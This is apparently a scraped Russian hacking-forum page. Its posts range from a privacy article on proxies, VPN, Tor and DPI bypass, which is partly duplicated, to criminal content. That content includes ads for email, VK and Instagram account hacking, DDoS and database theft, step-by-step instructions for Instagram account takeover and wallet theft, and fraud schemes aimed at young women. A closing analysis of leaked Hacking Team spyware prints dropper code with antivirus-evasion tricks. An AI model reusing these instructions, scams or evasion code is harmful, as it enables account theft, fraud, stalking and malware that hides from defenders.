обычным компьютером, то есть блокировать любую подозрительную активность. А все способы анонимизации трафика априори подозрительны, поэтому программы зачастую дают сбои или в принципе отказываются работать. Но и с этим можно бороться. Почти для каждой из описанных возможностей защищать канал связи есть надстройки, помогающие обходить зоркое око анализаторов DPI. Например, Shadowsocks имеет встроенную защиту от DPI и притворяется, что выполняет обычное подключение к удаленному серверу. OpenVPN сам по себе легко различим, но stunnel позволяет также обойти анализ пакетов. Stunnel маскирует канал VPN под соединение SSL, которое с виду безобидно: это может быть и простой браузер, который обращается к сайту по HTTPS. Благодаря этому заблокировать такой туннель непросто. Если перестараться, можно заблокировать вообще все. Обходить DPI также помогает tls-crypt, режим, введенный в версии OpenVPN 2.4, который шифрует трафик VPN. Создатели Tor Browser специально работают над обходом средств анализа DPI. При подключении к сети Tor можно воспользоваться транспортом-прослойкой, которая обеспечивает беспрепятственное подключение к первому серверу защищенной сети. Этот транспорт можно либо выбрать из списка (это общедоступные серверы), либо получить персональный на официальном сайте Tor Bridges. Лучше всего себя показывает obfs4 — это обфускатор, перемешивающий передаваемые данные так, что в Сети их нельзя определить. DPI обычно пропускает такие пакеты, поскольку не может предположить, что находится внутри. Еще есть несколько программ, которые пытаются тем или иным способом обмануть анализ пакетов, например разбивая их на мелкие части или меняя заголовки. В их числе GoodbyeDPIили Green Tunnel с простым графическим интерфейсом — они не скрывают ни IP, ни данные, но обходят блокировку. Кардинальным решением можно считать проект Streisand, его русское описание есть на GitHub. Это палочка-выручалочка в мире безопасности данных. Эта утилита всего за несколько минут развертывает и настраивает на удаленном сервере сразу несколько сервисов для защиты данных, а также дает подробную инструкцию по ним. Итог Для сохранения нашей с тобой интернет-безопасности и анонимности придумано множество технологий самого разного уровня. Часть из них проверена временем, другая помогает против новейших методов цензуры. Благодаря этому мы еще можем оставаться невидимыми, нужно лишь не забывать пользоваться этой возможностью. Источник
  5. Неважно, по каким причинам ты решил шифровать то, что пересылаешь через интернет. Это может быть забота о секретности личных данных, попытка обойти запреты того или иного государства или другие мотивы. В современном мире простым людям доступен неплохой выбор криптостойких шифрованных протоколов и программ, которые их реализуют. В этой статье мы пройдемся по всем классам таких решений (пусть многие из них и широко известны), обсудим надежность и посмотрим, какие доступны реализации. Прокси-серверы Прокси-серверы — самый доступный способ анонимизировать трафик: они дешевы и широко распространены. Их принцип работы очень прост: прокси — это почтальон, который доставляет конверты с письмами вместо тебя, аккуратно стирая имя отправителя, и возвращает ответ лично тебе в руки. Изначально эта технология была призвана защищать внутренние корпоративные сети от остального интернета (сотрудники получали доступ из внутренней сети в интернет через шлюз), но стала исторически первым способом анонимизировать трафик. Работая через прокси, компьютер все свои запросы перенаправляет через посредника (прокси-сервер), и уже посредник, представляясь твоим компьютером, запрашивает данные у сайтов. Прокси-серверы узкоспециализированы, поэтому на каждый тип интернет-соединения имеется свой тип прокси. Например, для FTP (File Transfer Protocol) есть FTP-прокси. Подробно мы разберем три типа прокси-серверов. HTTP и HTTPS могут работать только с запросами HTTP, а вся разница между ними в том, что HTTPS шифрует передаваемые данные, а HTTP — нет. Поэтому прокси HTTP не рекомендуются к пользованию, они могут лишь менять адрес IP, а данные защитить они неспособны. Также будь осторожен с выбором самого прокси-сервера, так как некоторые не только не защитят твои данные, но и могут раскрыть личность. INFO Обращай внимание на тип сервера — transparent proxy или anonymous proxy. Первые не будут скрывать твою личность! Использовать такой прокси несложно: найди в интернете или создай сервер, которому сможешь доверять, и, открыв настройки браузера (доступ к сети), введи данные. Тип SOCKS применяется в тех приложениях, которые либо не используют HTTP и HTTPS, либо не имеют встроенной поддержки прокси-серверов. В отличие от предыдущего типа, этот априори не будет публиковать твой IP, поэтому об анонимности можно не беспокоиться. Однако SOCKS сам по себе не предоставляет никакого шифрования, это лишь транспортный протокол. Чтобы применять его, есть, например, утилита Shadowsocks. SOCKS4 и SOCKS5 — это разные версии серверов. Убедительно рекомендую использовать пятую версию, так как она имеет много возможностей и более безопасна. Например, поддерживает использование логина и пароля, запросы DNS. А лучше даже использовать Shadowsocks — это SOCKS5 на стероидах. Тут есть и мощное шифрование, и скрытие трафика, и возможность обходить различные блокировки. Есть клиенты как для компьютера, так и для смартфона, позволяющие оставаться под защитой постоянно. Чтобы начать использовать SOCKS в привычных программах, не нужно ничего особенного. В Firefox и µTorrent эта функция встроена и доступна в настройках. Для Google Chrome есть расширение Proxy Helper. Можно воспользоваться универсальными программами вроде SocksCap или ProxyCap. Список множества бесплатных HTTP, HTTPS и SOCKS прокси-серверов можно найти либо с помощью поиска, либо в Википедии. VPN VPN (Virtual Private Network — виртуальная частная сеть) также изначально не задумывалась как средство защиты и анонимизации трафика. Ее задачей было объединить компьютеры в единую сеть, даже если они находятся за множество километров друг от друга. Ключевой особенностью стало то, что соединения VPN всегда защищались шифрованием, так как использовались в корпорациях и позволяли подключать несколько филиалов к головному офису. VPN имеет два режима: объединение двух локальных сетей между собой через интернет и подключение отдельного компьютера к удаленной локальной сети (удаленный доступ). Последний и послужил основой для некоммерческого, персонального варианта. Защита данных в соединении VPN предоставляется двумя техниками, которые зачастую используются вместе: PPP (Point-to-Point Protocol) используется для защиты на уровне канала данных, то есть на самом низком из возможных. Его задача — обеспечить стабильное соединение между двумя точками в интернете, а также предоставить шифрование и аутентификацию. PPTP (Point-to-Point Tunneling Protocol) является расширением и дополнением PPP. Для работы этого протокола устанавливается два соединения — основное и управляющее. Из-за того что придуман этот протокол был в далеком 1999 году, его безопасность оставляет желать лучшего. Ни один из методов шифрования, работающих с PPTP, не устойчив. Часть из них подвержена расшифровке даже в автоматическом режиме. Потому я не советую использовать PPTP. Этот протокол имеет серьезные уязвимости как в аутентификации, так и в шифровании и позволяет злоумышленнику очень быстро вскрыть канал и получить доступ к данным. Более новый способ создания соединения — еще один протокол, построенный поверх PPP, — L2TP (Layer 2 Tunneling Protocol). Цель этого протокола — не столько защитить соединение, сколько полностью регламентировать процесс сообщения компьютеров в сети. Данный протокол, кроме создания соединений VPN, также используется, например, для подключения банкоматов к офисам банков, что служит некоторой гарантией. Хотя и стоит учесть, что собственного шифрования у L2TP нет. L2TP не защищает сами данные, передаваемые в его рамках. Для этого обычно используется протокол IPsec (IP security). Он призван защищать содержимое пакетов IP и благодаря этому может шифровать любые виды соединений. Для VPN из двух возможных режимов используется лишь туннельный, защищающий не только данные передаваемого пакета в сети, но и его заголовки. Благодаря этому со стороны не будет видно, кто отправитель данных. IKE и IKEv2 (Internet Key Exchange) — строгие алгоритмы шифрования и защиты данных, передаваемых по информационному каналу. Используется исключительно с IPsec, так как является его защитным слоем — именно благодаря IKE данные в соединении остаются под замком. В общем-то, эти алгоритмы и послужили основой для развития всех современных средств и утилит создания соединений VPN, но настало время поговорить о том, что и из чего выбирать. С распространением SSL и TLS протокол PPP был расширен до SSTP (Secure Socket Tunneling Protocol) и в таком виде работает не через открытое соединение, а по SSL. Это гарантирует надежное шифрование и защиту от потери пакетов. Но стоит учитывать, что SSTP был разработан в Microsoft, а Microsoft сотрудничает с правительствами, поэтому доверять SSTP можно только с учетом этого. OpenVPN — самое популярное решение для создания защищенного соединения. Этот протокол открыт и предоставляет самую серьезную защиту, поэтому ему можно доверять. Настройка соединения вряд ли займет больше пары минут. SoftEther — мультиклиент для работы как с описанными выше протоколами, включая OpenVPN, так и со своим собственным, не менее безопасным, чем OpenVPN. В таблице ниже — небольшое резюме по этим решениям. Tor Tor (The Onion Router) — одно из лучших средств для обеспечения анонимности в Сети. Схема работы подразумевает трехкратную защиту данных и анонимизацию трафика. Как описано в самом названии, Tor использует так называемую луковую маршрутизацию: твои данные — это сердцевина лука, а их защита — слои вокруг. Так, каждый из промежуточных серверов Tor снимает свой слой защиты, и только третий, последний из них, достает сердцевину и отправляет запрос в интернет. Работу всей системы обеспечивают тысячи энтузиастов по всему миру, борющиеся за права человека и приватность. Благодаря этому для каждого отдельного сайта строится собственная цепочка промежуточных серверов Tor, что дает полную защиту: каждый сайт — новая личность. Большой плюс Tor — стабильность работы и большая забота об анонимности: благодаря усердиям многих специалистов он работает даже в Китае, стране, которая широко известна своим строжайшим подходом к блокировкам и наказаниями за их обход. Для упрощения жизни пользователям разработчики создали Tor Browser, основанный на Firefox, и улучшили его дополнениями, запрещающими сайтам следить за тобой. Например, HTTPS Everywhere заставляет веб-сайты использовать шифрование, а NoScript отключает выполнение скриптов на странице, фактически запрещая собирать любые данные пользователя. Скачать Tor, как и прилагающийся к нему браузер, можно на официальном сайте проекта Tor Project. DPI К сожалению, все эти средства могут оказаться бесполезными, если твой провайдер начал блокировки с применением DPI (Deep Packet Inspection) — системы глубокого анализа сетевого трафика. Цель DPI — отбрасывать все, что не похоже на работу обычного человека за обычным компьютером, то есть блокировать любую подозрительную активность. А все способы анонимизации трафика априори подозрительны, поэтому программы зачастую дают сбои или в принципе отказываются работать. Но и с этим можно бороться. Почти для каждой из описанных возможностей защищать канал связи есть надстройки, помогающие обходить зоркое око анализаторов DPI. Например, Shadowsocks имеет встроенную защиту от DPI и притворяется, что выполняет обычное подключение к удаленному серверу. OpenVPN сам по себе легко различим, но stunnel позволяет также обойти анализ пакетов. Stunnel маскирует канал VPN под соединение SSL, которое с виду безобидно: это может быть и простой браузер, который обращается к сайту по HTTPS. Благодаря этому заблокировать такой туннель непросто. Если перестараться, можно заблокировать вообще все. Обходить DPI также помогает tls-crypt, режим, введенный в версии OpenVPN 2.4, который шифрует трафик VPN. Создатели Tor Browser специально работают над обходом средств анализа DPI. При подключении к сети Tor можно воспользоваться транспортом-прослойкой, которая обеспечивает беспрепятственное подключение к первому серверу защищенной сети. Этот транспорт можно либо выбрать из списка (это общедоступные серверы), либо получить персональный на официальном сайте Tor Bridges. Лучше всего себя показывает obfs4 — это обфускатор, перемешивающий передаваемые данные так, что в Сети их нельзя определить. DPI обычно пропускает такие пакеты, поскольку не может предположить, что находится внутри. Еще есть несколько программ, которые пытаются тем или иным способом обмануть анализ пакетов, например разбивая их на мелкие части или меняя заголовки. В их числе GoodbyeDPIили Green Tunnel с простым графическим интерфейсом — они не скрывают ни IP, ни данные, но обходят блокировку. Кардинальным решением можно считать проект Streisand, его русское описание есть на GitHub. Это палочка-выручалочка в мире безопасности данных. Эта утилита всего за несколько минут развертывает и настраивает на удаленном сервере сразу несколько сервисов для защиты данных, а также дает подробную инструкцию по ним. Итог Для сохранения нашей с тобой интернет-безопасности и анонимности придумано множество технологий самого разного уровня. Часть из них проверена временем, другая помогает против новейших методов цензуры. Благодаря этому мы еще можем оставаться невидимыми, нужно лишь не забывать пользоваться этой возможностью. Источник View full article
  6. Все о Ботнет – программе для взлома Ботнет – это компьютерная сеть из устройств, что заражены вредоносным программным обеспечением. Понятие происходит от двух английских слов «бот» (сокращенное от слова робот) и «нетворк» – сеть. Данный скрытый софт устанавливается на компьютерное устройство, чтобы потом его можно было несанкционированно использовать. Программа для взлома используется для хакерских атак, подбора паролей, распространения спама и так далее. Чтобы получить управление компьютером, на него скрытно инсталлируется ботнет, скачать который можно, но для этого нужно разбираться хоть немного, в том, как это работает. Зараженные устройства иногда называются зомби-машинами. Попадание бота может произойти из-за недостаточной внимательности компьютерного пользователя, поскольку такой софт имитирует полезное программное обеспечение. Боты самостоятельно включаются на компьютере, защищаются от удаления. Зараженными ботнетом компьютерами можно управлять практически из любой точки мира. Создавать, скачать или купить Если Вас интересует, как создать ботнет, нужно понимать, что такая программа необязательно должна быть усложнена какими-то «плюшками». Хороший софт для взлома тот, который хорошо справляется с поставленными задачами. Нужен минимально необходимый функционал. С одной стороны написание данного софта требует определенных знаний программирования и сетевых технологий. Создание ботнета не обходится без знания сетевых протоколов, криптографии. Это не запредельный уровень программирования, но если у Вас его нет, то действительно проще купить ботнет. Однако тут возникает другая загвоздка. Если Вы не слишком разбираетесь в сфере написания кода, Вас легко могут обмануть, наобещать хороший функционал и рабочую программу. В Интернете полно мошенников. Необходимо максимально обезопасить себя и зайти на проверенный ресурс, например, вот сюда. Здесь, на форуме предлагаются разные товары и услуги, в том числе различные программы для взлома и способы взлома социальных сетей. Но прежде чем предлагать свои услуги продавцы проходят тщательную проверку у администрации сайта. После прохождения проверки в ветке форума появляется соответствующая отметка. Это дополнительная безопасность и гарантия прозрачности и выгоды сделки для обеих сторон.
  7. Доброго времени суток, уважаемые форумчане ! Рады представить вам уникальное обучение взлому почт. Ниже описаны сущность и принципы нашего предложения, для получения информации по возникшим вопросам мы с радостью ответим Вам по контактам, указанным в нижней части объявления. - Для начала хотелось бы представиться. Наш сервис UslugiMail работает на рынке взлома почт и соц. сетей уже порядка 7 лет. Наши темы с огромным количеством отзывов и статусом «Проверенного продавца» вы можете найти на многих авторитетных форумах. Ссылка на нашу основную (устаревшую) тему с отзывами с данного форума: Прайс Мы разделили наше предложение на разные пакеты, выбрать которые вы можете исходя из своих финансовых возможностей, потребностей и первоначальных навыков. - Обучение взлому почт @mail , @yandex, @rambler + корпоративные почты: 1 пакет(базовый) - 15 000р 2 пакет(средний) - 40 000р 3 пакет(максимальный) – 70 000р (бонусом входит обучение взлому ВК) - Обучение взлому ВК: 1 пакет: 10 000р 2 пакет: 25 000р - Обучение взлому Instagram: 1 пакет: 15 000р 2 пакет: 25 000р Выше представлены стандартные пакеты и цены, для вашего удобства мы можем подобрать софт с обучением под ваши потребности и финансовые возможности. А так же в арсенале имеется множество других возможностей. Пишите по контактам, обсудим . Нашей задачей было именно автоматизировать процесс обучения, для получение полупассивного дохода с обучений, условно мы сели и изложили весь наш опыт в тексте и видео материалах, описав до мелочей все процессы, и теперь мы продаём онлайн учебники в которых есть теоретическая часть и практические задания , после прочтения и выполнениях которых, даже лютый чайник осваивает навыки, и уже только после этого задает все возникшие у него вопросы в процессе обучения. В результате клиент получает максимально структурированную информацию, пошаговые задания, имеет возможность после освоения навыков получить обратную связь по всем вопросам, а мы в свою очередь экономим свое время. Чему вы научитесь: Получать доступ методом фишинга к конкретно интересующему вас email адресу или странице ВК , производить массовые взломы, например на 1000 ящиков сразу, выполнять различные манипуляции с ящиками, узнаете о работе спам фильтров почтовых серверов, узнаете о функциях защиты каждого популярного почтового сервиса. В итоге вы сможете с довольно низкими затратами взламывать интересующие вас почтовые ящики, страницы в ВК зарабатывая на этом, либо же получать ценную информацию с почтовых ящиков или соц. сетей ваших недругов, подруг или конкурентов. Почему стоит обратиться к нам для освоения навыков взлома? - Возможно вы подумаете, что в интернете есть не мало информации по этому поводу, предложений по продаже фейков для взлома и тд. Но это ни чуть не более, чем устаревшие и кривые способы взлома. - Мы работаем на рынке взлома уже более 7 лет, имеем тысячи довольных клиентов, сотни положительных отзывов на уважаемых площадках, поэтому стоит понимать, что мы как никто другой понимаем чему вас учим. Это именно практический опыт, мы учим тому что работает сегодня, а не сливаем устаревший не рабочий материал. А так же вы можете подумать, зачем нам продавать те навыки и софт, которые приносят прибыль, не боитесь ли вы конкуренции? Как уже было сказано выше, это полу-пассивный доход для нас на продаже обучающего материала, который будет представлен в ограниченном количестве .К тому же у нас имеется не малое количество постоянных клиентов, работая с которыми мы можем позволить себе продавать часть обучающего материала и софта. Ну и конечно же не будем лукавить, мы в какой-то мере все равно печемся о своем положении и оставляем себе пару козырей в рукаве, которым не готовы обучать Наши контакты: ЛС Telegram: @RtRun
  8. Взлом электронных кошельков С непрерывным развитием новых технологий взлом электронных кошельков уже не проходит так просто. Постоянно принимаются меры, чтобы защитить данные пользователей, да и сами владельцы электронных кошельков стараются максимально обезопасить себя. Если Вы думаете, что, скачав из Интернета определенную программу, заявленную как «взломщик кошельков», получите доступ к электронному хранилищу средств, то, вероятнее всего, ничего не выйдет. Скорее всего, мошенники предлагают обычный вирус, которым Вы просто заразите компьютер, но результата не добьетесь. Можно попробовать осуществить взлом кошельков без программы. В этом случае задействуются терминалы. 1. Во многих магазинах стоят терминалы, которыми каждый день пользуется огромное число людей. Когда операции завершаются, посетитель кликает на «выход». Она должна закрыть учетную запись, получить чек и выбросить. Но в действительности учетная запись не закрывается. 2. Получить доступ к аккаунту пользователя можно, если заполучить телефонный номер, прописанный на таком чеке, который, как правило, выбрасывается в урну. 3. Когда доступ к учетной записи получен, можно осуществлять все операции, в том числе вывод средств с электронного кошелька. Основная проблема состоит в том, что нужно знать номер. Многие забирают чеки с собой, в определенных районах установлены камеры, препятствий много, впрочем, как и схем, с помощью которых осуществляется взлом денег на кошельке. Чтобы сделать все правильно и получить положительный результат, нужно обладать определенными знаниями, понимать, как работает система и что кошельки, хранящие средства пользователей, очень хорошо охраняются от взлома. Но если вы поняли, что ничего не остановит, значит, стоит найти того, кто умеет это сделать. Однако тут возникает вопрос, как самому не напороться на мошенников, которые только воспользуются предложением, заберут деньги, а работу не сделают. Вот на этом ресурсе оставляют объявления разные продавцы, предлагающие услуги и товары. Но прежде чем начать взаимодействие с посетителями, они проходят проверку у администрации сайта. После прохождения проверки в ветке форума появляется соответствующая отметка. Это дополнительный гарант безопасности, прозрачности и выгоды сделки для обеих сторон.
  9. Как взломать аккаунт в Инстаграм? Если Вы ищете, как взломать аккаунт в Инстаграме, то сегодня предлагаются разные способы сделать это. Проблема в том, что они постоянно раскрываются и уже становятся неэффективными. В открытом доступе есть относительно результативные методы, а если Вы хотите однозначно положительного результата, имеет смысл обратиться к тем, кто в этом разбирается. Например, существует метод-уловка «забыл пароль». Его суть заключается в том, что для взлома нужно знать только никнейм пользователя, которого следует взломать. 1. В первую очередь требуется открыть аккаунт в этой социальной сети и кликнуть на иконку софта. Высветится домашняя страница приложения, если Вы залогинены. 2. Далее нужно нажать на вкладку «Меню» и выбрать «Add Account». 3. Затем откроется вход, необходимо ввести никнейм пользователя, которого Вы хотите взломать. Нажмите «забыл пароль». 4. Чтобы подтвердить, что это ваш аккаунт, необходимо нажать подтверждение по СМС и ввести собственный номер телефона. 5. На этот номер придет ссылка на сброс пароля по СМС, чтобы сменить пароль в аккаунте. 6. Далее откройте сообщение и нажмите на смену пароля аккаунта в соответствующем разделе «сменить пароль». 7. Введите новый пароль на Ваш выбор и входите в Инстаграм. Это открытая схема, рассказывающая, как взломать чужой аккаунт в Инстаграм. Это не означает, что она нерабочая. Но для того, чтобы претворить ее в жизнь, нужно, во-первых, знать никнейм пользователя, а во-вторых, все равно действия будут перепроверяться технической поддержкой. Тем более если Вас интересует, как взломать закрытый аккаунт в Инстаграме. Чтобы получить однозначно положительный результат, стоит обратиться к тем, кто может сделать это быстро и без проблем. Однако как понять, что те, кто предлагает подобные услуги, «не кинет», не возьмет деньги и оставит дело несделанным? Нужно обратиться на тематический форум, но проверенный, например, вот сюда . Здесь предлагаются, в том числе услуги по взлому аккаунтов в социальных сетях. Однако перед тем как продавцы могут начать взаимодействовать с клиентами, они проходят проверку от администрации сайта. Это позволяет обезопасить посетителей от «кидалова», которое поджидает сплошь и рядом в такой сфере. После проверки появляется соответствующая отметка в ветке форума.
  10. Как заработать на взломе ВК без взлома ВК Существует несколько способов взломать ВКонтакте. Наиболее простой из них – создать фейковый сайт, похожий на ВК, заманить на него пользователя, который введет свои логин и пароль. Можно воспользоваться вирусом «rat» – специальным скриптом, созданным для считывания чужих паролей. Также возможно применение брута – хакерского софта, подбирающего пароли. Однако для того, чтобы заработать, необязательно на самом деле взламывать ВК, мы предлагаем несколько вариантов получения предоплаты без продолжения предоставления услуг с Вашей стороны. Эффективные способы быстрого заработка Способ № 1. Не очень действенный, зато самый простой и не требующий особых усилий. Достаточно дать массовую рекламу своих услуг, взять предоплату с заинтересовавшихся пользователей и пропасть с концами. Этот прием скорее мертв, чем жив, но, как говорится, раз в год и палка стреляет. Способ № 2. Взять заказ на взлом страницы и создать ее фейк, используя имя и фото с аватара жертвы, а затем написать заказчику с этого же аккаунта, что он взломан, и пароль будет передан ему после оплаты. Чтобы клиент не начал проверять подлинность страницы, его необходимо торопить, ссылаясь на то, что владелец аккаунта может быстро заметить неладное и что-либо предпринять. Не всегда, но в большинстве случаев эта схема показывает себя вполне рабочей. Способ № 3. Сыграть на женском любопытстве – старая, но эффективная схема. Находите аккаунт девушки возрастом от 18 до 30 лет, пишите ей, что Вам поступил заказ на взлом ее страницы, за который Вы уже получили 50% предоплаты, но, так как видите, что она баба нормальная, а заказчик еще и в друзьях у нее есть (это уточнение помогает повысить интерес особы), готовы за оставшуюся часть суммы открыть ей имя ее тайного воздыхателя, а аккаунт ее не трогать. Важно выбирать хорошо одетых, путешествующих женщин – тех, с кого есть что взять. В качестве доказательства предоставьте скрин Вашей переписки с заказчиком, которую Вы, естественно, создадите сами с помощью своей второй страницы. При этом имя и фотографию «своего клиента» необходимо зачеркнуть, используя paint. Если Вам кажется, что этот способ не действенный, Вы просто недооцениваете женское любопытство, некоторые девушки, сходу отвечающие отказом, пишут через пару дней, желая все-таки узнать имя их тайного поклонника. Способ № 4. Немного более трудоемкий вариант, но зато позволяющий хорошо и все еще безопасно заработать. Вначале требуется создать лендинг, содержащий информацию о том, что Вы взламываете аккаунты в ВК без предоплаты и со стопроцентной гарантией. Дать рекламу о нем в небольших пабликах в социальной сети. Лучше всего выбирать группы, в которых собираются жители небольших городов с населением до 50 тысяч человек. В большинстве случаев эти пользователи намного меньше времени проводят в Интернете, посещают ограниченное количество ресурсов и еще не сталкивались с огромным количеством разводняков, уже пережеванных и выплюнутых жителями столицы. Заказчики обязательно найдутся, ведь Вы предлагаете отличные условия. Конечно же, ориентироваться нужно на людей, фотографии которых говорят о наличии у них денег. Берете заказ у парня на взлом страницы девушки, договариваетесь о сумме, связываетесь с жертвой, сдаете заказчика, в качестве доказательства показываете вашу переписку, обещаете ей половину от итоговой суммы за то, что она проделает определенные действия, которые докажут молодому человеку, что Вы ее-таки взломали, получаете от него обещанные деньги, с ней не делитесь. Большинство женщин соглашаются помочь как из-за обиды на взломщика, так и из желания заработать, с этим вопросом проблем почти никогда не возникает. Все предложенные способы не требует много времени и усилий, а также они вполне безопасны.
  11. Приветствую.В данной теме предлагаю услуги по взлому страниц ВКонтакте на заказ. К прочтению. Информация по предоставлению услуг: -Взлом осуществляется без каких-либо предоплат, оплата следует после успешного взлома и предоставления вам доказательств владения странички жертвы. -Для взлома подходит не любая страница. Фейки не принимаются. -Взломать получается не каждую страницу,шанс-парней 50/100,девушек 80/100. -Быстрое выполнение работы. -Страница жертвы взлома должна быть активной,т.е пару раз в день бывать онлайн. -Совершенная анонимность,в случаи если вы сами не спалитесь,когда будите пользоваться взломанной страничкой. -Оплата производится исключительно после успешного взлома. -Пароль после взлома не меняем. -Доказательствами владения страничкой жертвы могут быть разные: все возможные скрины,различные действия с аккаунтом. -Приветствуется работа через Гарант-ов, за ваш счёт. Сроки: от 10 минут, до 3-х дней. Прайс Лист: Обычный заказ - 1500[rub] Срочный заказ - 2000[rub] (для этого во время обращения жертва должна быть онлайн). От 5 стр, скидка 10% От 10 стр, скидка 20% Что требуется от вас: При добавлении кинуть ссылку на жертву, написать интересующий вид заказа(обычный/срочный),указать примерный онлайн жертвы. Оплата: Оплатить работу нужно сразу или в течении нескольких часов -Qiwi -WebMoney
  12. Взлом сайта, слив базы данных, ликвидация сайта-конкурента, ддос услуги -Работаю только через гаранта, никаких предоплат и бесплатных тестов -Работаю без посредников -Берусь за сложные проекты -К каждому клиенту индивидуальный подход -Полная анонимность Пишите! Помогу
  13. Осуществляю подбор паролей к почтовым ящикам mail.ru, bk.ru, list.ru, inbox.ru, yandex.ru, rambler.ru - стоимость по 4000р., gmail.com - стоимость по 5000р., yahoo.com, me.com - по 6000р. Вайбер Россия - 30000р. Работу веду от 1 до 10 дней, 100% гарантий что аккаунт откроется - не предоставляю, по статистике от 60 % заявок исполняется. В качестве доказательств, прочитаю Ваше тестовое письмо или сделаю скрины входящих-исходящих писем. Вперед пароли не даю. Оплата яндекс деньги или вебмани после предоставления доказательств. Анонимность гарантирую. Пароль остаётся прежним. Также: открою резюме на платных работных сайтах (hh.ru, Superjob.ru, rabota.ru). Это намного экономнее, Вы не платите ничего лишнего, только за то, что Вам интересно! Доступ по всей РФ + РБ. Стоимость от 50р. анкета и ниже в зависимости от количества. Согласен так же на работу через Гаранта но за Ваш счет. По консультации или заказу пишите в ЛС, о принятии заказа всегда отпишусь. Кидал прошу не беспокоить! Берегите мое и свое время!
  14. Прошел пoчти год с момента взлома компании Hacking Team, специализирующейся на разработке шпионского программного обеспечения для спeцслужб со всего мира. Самое интересное, что в Сеть утекли исходники их платформы Galileo, но до сих пор не пoявилось более-менее подробного их обзора или анализа. Сегoдня мы постараемся исправить это упущение. Galileo в телескопе Не будем терять вpемя на ненужные предисловия и сразу же перейдем к делу. Вся платформа разбита на Git-репозитоpии c различным назначением и под разные платформы: Windows, Linux, BlackBerry, Windows Mobile, iOS, macOS, Android, но мы будем рассматривать только кoд под Windows и Linux. Сами модули, содержащиеся в репозиториях, можно поделить на нeсколько типов: модули, названия которых начинаются с приcтавки vector-, предназначены для проникновения и закрепления в системе; мoдули с приставкой core- — собственно основное ядро платформы, отвечает за сбор и передачу «хозяину» необходимой информaции. Есть также несколько вспомогательных модулей, выносить их в отдельную кaтегорию не будем, но обязательно рассмотрим. В основном вся платфоpма, заточенная под Windows, разработана на C++ (небольшая часть на Python), Linux-код напиcан на C. Также есть код и на Ruby — на нем разработана серверная часть продукта, мы же будeм рассматривать только клиентскую. Но давай уже перейдем к практическoй части («Меньше слов, покажите мне код» — Линус Торвальдс) и посмотрим, какие пpиемы использовали парни из Италии, чтобы не засветиться на радарах и доставить свoе программное обеспечение до «клиентов». RCSWin32Dropper Этот модуль обeспечивает первоначальный этап заражения атакуемого объекта: «размазывает» по файлoвой системе необходимые файлы, их расшифровывает, обеспечивает persistence и прочее. В кoде присутствует очень много комментариев, название самих перемeнных, модулей, все сделано очень удобно, много help-информации при рабoте с CLI — в общем, видно, что ребята старались, делали продукт, удобный для заказчика. Все приведeнные вставки кода — это Copy-Paste из исходного кода, все комментарии разрабoтчиков тоже по возможности сохранены, для удобства некоторые переведены. Для облегчения сборки контейнера, который пoтом будет доставляться на целевую машину, разработчики сделали полноценный CLI в двух мoдификациях. Первый вариант сборки: // SCOUT SCOUT SCOUT(разведчик) if (!strcmp(argv[1], "-s")) { if (argc != 5) { printf("usage: RCSWin32Dropper.exe -s <scout> <input> <output>\n"); return 0; } printf("Cooking for scout\n"); ... } В данном случае <input> — чистый файлик, котоpый перемешивается с «необходимым» кодом, в нашем случае — <scout> (модуль «разведчик», опpеделяет, находится ли семпл в песочнице, выявляет наличие антивирусных средств), код даннoго модуля рассмотрим ниже. Итак, за «микс» между чистым файлом и необходимой пoлезной нагрузкой отвечает код из MeltFile.cpp, а именно функция MeltFile, она и инициализиpует процесс скрещивания двух файлов. Подробно на том, как она это делает, останaвливаться не будем, но основная цель — подмена текущего, чистого EntryPoint на функцию DropperEntryPoint из DropperCode.cpp (собственно, уже в этом кoде и выполняется вся магия по извлечению модулей, которая будет описана ниже). Второй экземпляр поставки отличается только тем, что он «запихивает» в наш файл-контейнeр все необходимые модули — ядро, драйвер, конфигурационный файл и остальные: if (argc != 12) { printf("ERROR: \n"); printf(" usage: RCSWin32Dropper.exe <core> <core64> <conf> <driver> <driver64> <codec> <instdir> <manifest> <prefix> <demo_bitmap> <input> <output>\n\n"); printf(" <core> is the backdoor core\n"); // Ядpо printf(" <core64> is the 64 bit backdoor core\n"); // Ядро для 64-разрядных систем printf(" <conf> is the backdoor encrypted configuration\n"); // Конфигурация printf(" <driver> is the kernel driver\n"); // Драйвер printf(" <driver64> is the 64 bit kernel driver\n"); // Драйвер для 64-разрядных систем printf(" <codec> is the audio codec\n"); // Аудиокодек, нaверно для записи голоса :) printf(" <instdir> is the backdoor install directory (on the target)\n"); // Директория для распаковки printf(" <manifest> is a boolean flag for modifying the manifest\n"); // printf(" <prefix> is the core exported function(s) name prefix\n"); // printf(" <input> is the exe to be melted\n"); // Файл, с кoторым будем смешивать printf(" <output> is the output file\n\n"); // Файл-контейнер return 0; } DropperEntryPoint На данном этапе стоит более пoдробно раскрыть работу DropperEntryPoint — функции, которая будет распаковывaть основные модули на целевую машину. С самого начала кода можно увидеть обxод эмулятора Avast, причем простым циклом на уменьшение — наверное, проcто тянут время, и таким образом AV прекращает проверку эмулятором после 250–300 опeраций. В принципе, данная техника не нова: // bypass AVAST emulation (SuspBehav-B static detection) for (int i = 0; i < 1000; i+=4) i -= 2; После восстанавливаем стандартным способом Entry Point, через call pop, затем находим секцию внутри текущего модуля с пометкой <E> (чтобы обнаружить смeщение в коде, откуда начинаются модули, которые будем распаковывaть), причем ищем обычным перебором по байтам в виде ассемблерной вставки: while(1) { __asm { mov ecx, [dwCurrentAddr] // ecx = *dwCurrentAddr magicloop: sub ecx, 1 mov edx, [ecx] mov ebx, edx and ebx, 0xffff0000 and edx, 0x0000ffff cmp edx, 0x453c // E> jne magicloop // edx != ‘E>’ nop cmp ebx, 0x003e0000 ‘<’ jne magicloop mov [dwCurrentAddr], ecx jmp endmagicloop } } Ассемблерная вcтавка используется с целью обхода Dr.Web, по крайней мере так указано в комментаpиях: // *** Find the ending marker of data section <E> - ASM because of Dr.Web . Следующим этапом будет восстановление собственной таблицы импорта: // Накидывaем импортируемые функции в виде массивов CHAR strVirtualAlloc[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0x0 }; // Предварительно определим прототип импортируемых функций typedef LPVOID (WINAPI *VIRTUALALLOC)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); // Получим адpес функции через обертку функций GetProcAddress, LoadLibrary VIRTUALALLOC pfn_VirtualAlloc = (VIRTUALALLOC) pfn_GetProcAddress(pfn_LoadLibrary(strKernel32), strVirtualAlloc); // Обертка функции LoadLibrary LOADLIBRARY pfn_LoadLibrary = resolveLoadLibrary(); // Обертка функции GetProcAddress 